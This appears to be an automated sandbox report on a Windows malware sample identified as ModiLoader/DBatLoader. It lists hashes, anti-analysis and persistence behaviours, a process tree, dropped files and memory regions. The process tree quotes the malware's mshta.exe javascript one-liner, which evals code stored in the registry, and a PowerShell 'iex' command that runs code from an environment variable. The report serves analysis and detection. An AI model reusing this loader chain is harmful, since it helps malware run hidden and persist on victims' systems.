Analysis

  • max time kernel
    150s
  • max time network
    154s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    21-09-2024 16:59

General

  • Target

    f03ec6bc9c336fac11a26114bd3f987b_JaffaCakes118.exe

  • Size

    454KB

  • MD5

    f03ec6bc9c336fac11a26114bd3f987b

  • SHA1

    3e3cc9071528b9959d3fcc11d7182a7b69510039

  • SHA256

    22701e3e1f1b560bd9980306b3dcd03e75e0f4340625ac19af57ef0d90b2a70c

  • SHA512

    29f571df3c15bb17af9fe8d942b574d0b96729c85692b4243b23f08664ab25d0e5f9b236692c2723d8be9283fc608ec0efbc6d1905b8f74c6edf0a1d374993e3

  • SSDEEP

    6144:6fFMU5fHe486G8ZutGfLjDLYXDvf7hhav0TwoSWPIOv/r5AJei4B74I:6mUFx8unDLYTX7h8KSWjH2UX

Malware Config

Signatures

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
  • Looks for VirtualBox drivers on disk 2 TTPs 1 IoCs
  • ModiLoader Second Stage 49 IoCs
  • Looks for VMWare Tools registry key 2 TTPs 1 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Deletes itself 1 IoCs
  • Drops startup file 1 IoCs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies registry class 7 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\f03ec6bc9c336fac11a26114bd3f987b_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\f03ec6bc9c336fac11a26114bd3f987b_JaffaCakes118.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2364
    • C:\Users\Admin\AppData\Local\Temp\f03ec6bc9c336fac11a26114bd3f987b_JaffaCakes118.exe
      "C:\Users\Admin\AppData\Local\Temp\f03ec6bc9c336fac11a26114bd3f987b_JaffaCakes118.exe"
      2⤵
      • System Location Discovery: System Language Discovery
      PID:2452
  • C:\Windows\system32\mshta.exe
    "C:\Windows\system32\mshta.exe" javascript:xAoYahA5="Q";H55g=new%20ActiveXObject("WScript.Shell");m3xZvEfbA="Nono5i2PZU";OIU4Y0=H55g.RegRead("HKLM\\software\\Wow6432Node\\DV2iZ5Enxv\\qKo4CiDX");eUw4o7RP="PXIft";eval(OIU4Y0);DanQu1l="Wf5Sao08";
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:2852
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:zfwqat
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Drops file in System32 directory
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2880
      • C:\Windows\SysWOW64\regsvr32.exe
        regsvr32.exe
        3⤵
        • Looks for VirtualBox Guest Additions in registry
        • Looks for VirtualBox drivers on disk
        • Looks for VMWare Tools registry key
        • Checks BIOS information in registry
        • Deletes itself
        • Drops startup file
        • Adds Run key to start application
        • Maps connected drives based on registry
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Modifies Internet Explorer settings
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of WriteProcessMemory
        PID:1568
        • C:\Windows\SysWOW64\regsvr32.exe
          "C:\Windows\SysWOW64\regsvr32.exe"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1616

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\433fb8\240497.bat

    Filesize

    61B

    MD5

    1d06860b64c4072361d52f6a00c431ca

    SHA1

    db14a9606b1890be159fcee77408318872015d08

    SHA256

    2c651141246b4d81ff4ee6cc84ffb5625bead8968fb9f2112d6ba969461d7947

    SHA512

    6d76ff1f738c611f8f8f269c60ee9440e85b80517226f27d87c279e0d05f0682e71a48b8d176da69be34fd6e7d5102d7e3ba153c6209218f714056fb0c857a11

  • C:\Users\Admin\AppData\Local\433fb8\9e8496.lnk

    Filesize

    881B

    MD5

    dd626c405b18a55dc0b2cce2874cd2f3

    SHA1

    a4b8313e88df563f159b99265771862418bbc9d3

    SHA256

    68e2756574699a24d436103cd8388adf74687c7315d58f87a28b89a63bc3a150

    SHA512

    a9d3781f6b9e41b4d2fb1a98d9380eb4ef2044ffc55c53d6dd8b3cc6ec2865b99ad1e1b99ecb4e0b3141e32b9472a1548620a47a385458730b2d719af020029a

  • C:\Users\Admin\AppData\Local\433fb8\ab2c43.21b5e51

    Filesize

    29KB

    MD5

    fe19a09b47e25bdd46dd6f4b9ac20259

    SHA1

    581e291bcf117f22bf3b35b0d0a7c55f3b060859

    SHA256

    8b65e693f736c53bdc6b3e4ba479ec8f54e55c0d687b8cd6bea13845177bbe30

    SHA512

    37daea273827d2e8cb8e2c9f266948ce967188ea14d1958234bd52c3bfc2f2c42507d03c91e23f0127a6d9c9e0dc9f1cc266ce755f0835fbf424c91091d83e69

  • C:\Users\Admin\AppData\Roaming\5ac6dc\097814.21b5e51

    Filesize

    31KB

    MD5

    de2069fe402123165c00e4b74d5f7943

    SHA1

    09e2733f6ba0dadeff000e23eac4c057f5aa6b02

    SHA256

    85c37a578f3e1405e0c4e0ceb0f0d2007737386211d8d82d4b208fe0ac48d6e6

    SHA512

    005096f3830b1908468d5fa0520ae5f6513b4759a8bbea9b00da4ff9d097fa5cf0d8b4896e88dafcf6aa044ffefefb051b649b305ac67b9e0014c0de18939501

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\b719cc.lnk

    Filesize

    991B

    MD5

    754ebd5bb11664803ade17b82e6df075

    SHA1

    bd25c7498f4e5b7b1a6b026afb3828b118179894

    SHA256

    fbaa91894a29e56d83e0429e6384e3c1ef12ef7f3b63f3fe2d2ed0317711baaf

    SHA512

    b6e489ec8e3cce7d96d98d1da5f450aa590d53194bf735d8fda438ee071f9f276e03e3fd8e66ff83bb5e70f78374b7cc25462aeaeefd24ab8f76284e5f5e5a8c

  • memory/1568-43-0x00000000001C0000-0x00000000002FE000-memory.dmp

    Filesize

    1.2MB

  • memory/1568-70-0x00000000001C0000-0x00000000002FE000-memory.dmp

    Filesize

    1.2MB

  • memory/1568-53-0x00000000001C0000-0x00000000002FE000-memory.dmp

    Filesize

    1.2MB

  • memory/1568-52-0x00000000001C0000-0x00000000002FE000-memory.dmp

    Filesize

    1.2MB

  • memory/1568-60-0x00000000001C0000-0x00000000002FE000-memory.dmp

    Filesize

    1.2MB

  • memory/1568-61-0x00000000001C0000-0x00000000002FE000-memory.dmp

    Filesize

    1.2MB

  • memory/1568-66-0x00000000001C0000-0x00000000002FE000-memory.dmp

    Filesize

    1.2MB

  • memory/1568-67-0x00000000001C0000-0x00000000002FE000-memory.dmp

    Filesize

    1.2MB

  • memory/1568-69-0x00000000001C0000-0x00000000002FE000-memory.dmp

    Filesize

    1.2MB

  • memory/1568-77-0x00000000001C0000-0x00000000002FE000-memory.dmp

    Filesize

    1.2MB

  • memory/1568-44-0x00000000001C0000-0x00000000002FE000-memory.dmp

    Filesize

    1.2MB

  • memory/1568-45-0x00000000001C0000-0x00000000002FE000-memory.dmp

    Filesize

    1.2MB

  • memory/1568-46-0x00000000001C0000-0x00000000002FE000-memory.dmp

    Filesize

    1.2MB

  • memory/1568-39-0x00000000001C0000-0x00000000002FE000-memory.dmp

    Filesize

    1.2MB

  • memory/1568-37-0x00000000001C0000-0x00000000002FE000-memory.dmp

    Filesize

    1.2MB

  • memory/1568-51-0x00000000001C0000-0x00000000002FE000-memory.dmp

    Filesize

    1.2MB

  • memory/1568-42-0x00000000001C0000-0x00000000002FE000-memory.dmp

    Filesize

    1.2MB

  • memory/1568-41-0x00000000001C0000-0x00000000002FE000-memory.dmp

    Filesize

    1.2MB

  • memory/1568-40-0x00000000001C0000-0x00000000002FE000-memory.dmp

    Filesize

    1.2MB

  • memory/1568-38-0x00000000001C0000-0x00000000002FE000-memory.dmp

    Filesize

    1.2MB

  • memory/1568-35-0x00000000001C0000-0x00000000002FE000-memory.dmp

    Filesize

    1.2MB

  • memory/1568-59-0x00000000001C0000-0x00000000002FE000-memory.dmp

    Filesize

    1.2MB

  • memory/1568-58-0x00000000001C0000-0x00000000002FE000-memory.dmp

    Filesize

    1.2MB

  • memory/1568-57-0x00000000001C0000-0x00000000002FE000-memory.dmp

    Filesize

    1.2MB

  • memory/1568-47-0x00000000001C0000-0x00000000002FE000-memory.dmp

    Filesize

    1.2MB

  • memory/1568-55-0x00000000001C0000-0x00000000002FE000-memory.dmp

    Filesize

    1.2MB

  • memory/1568-56-0x00000000001C0000-0x00000000002FE000-memory.dmp

    Filesize

    1.2MB

  • memory/1568-48-0x00000000001C0000-0x00000000002FE000-memory.dmp

    Filesize

    1.2MB

  • memory/1568-78-0x00000000001C0000-0x00000000002FE000-memory.dmp

    Filesize

    1.2MB

  • memory/1568-50-0x00000000001C0000-0x00000000002FE000-memory.dmp

    Filesize

    1.2MB

  • memory/1568-49-0x00000000001C0000-0x00000000002FE000-memory.dmp

    Filesize

    1.2MB

  • memory/1616-84-0x00000000001B0000-0x00000000002EE000-memory.dmp

    Filesize

    1.2MB

  • memory/1616-85-0x00000000001B0000-0x00000000002EE000-memory.dmp

    Filesize

    1.2MB

  • memory/2364-0-0x00000000002D0000-0x0000000000313000-memory.dmp

    Filesize

    268KB

  • memory/2364-1-0x00000000002D0000-0x0000000000313000-memory.dmp

    Filesize

    268KB

  • memory/2452-17-0x0000000001D40000-0x0000000001E14000-memory.dmp

    Filesize

    848KB

  • memory/2452-24-0x0000000001D40000-0x0000000001E14000-memory.dmp

    Filesize

    848KB

  • memory/2452-10-0x0000000000400000-0x0000000000439000-memory.dmp

    Filesize

    228KB

  • memory/2452-12-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

    Filesize

    4KB

  • memory/2452-22-0x0000000001D40000-0x0000000001E14000-memory.dmp

    Filesize

    848KB

  • memory/2452-2-0x0000000000400000-0x0000000000439000-memory.dmp

    Filesize

    228KB

  • memory/2452-8-0x0000000000400000-0x0000000000439000-memory.dmp

    Filesize

    228KB

  • memory/2452-6-0x0000000000400000-0x0000000000439000-memory.dmp

    Filesize

    228KB

  • memory/2452-20-0x0000000001D40000-0x0000000001E14000-memory.dmp

    Filesize

    848KB

  • memory/2452-23-0x0000000001D40000-0x0000000001E14000-memory.dmp

    Filesize

    848KB

  • memory/2452-4-0x0000000000400000-0x0000000000439000-memory.dmp

    Filesize

    228KB

  • memory/2452-16-0x0000000000400000-0x0000000000439000-memory.dmp

    Filesize

    228KB

  • memory/2452-14-0x0000000000400000-0x0000000000439000-memory.dmp

    Filesize

    228KB

  • memory/2452-18-0x0000000000400000-0x0000000000439000-memory.dmp

    Filesize

    228KB

  • memory/2452-19-0x0000000001D40000-0x0000000001E14000-memory.dmp

    Filesize

    848KB

  • memory/2880-34-0x00000000061B0000-0x0000000006284000-memory.dmp

    Filesize

    848KB

  • memory/2880-36-0x0000000002FF0000-0x0000000004FF0000-memory.dmp

    Filesize

    32.0MB

  • memory/2880-54-0x00000000061B0000-0x0000000006284000-memory.dmp

    Filesize

    848KB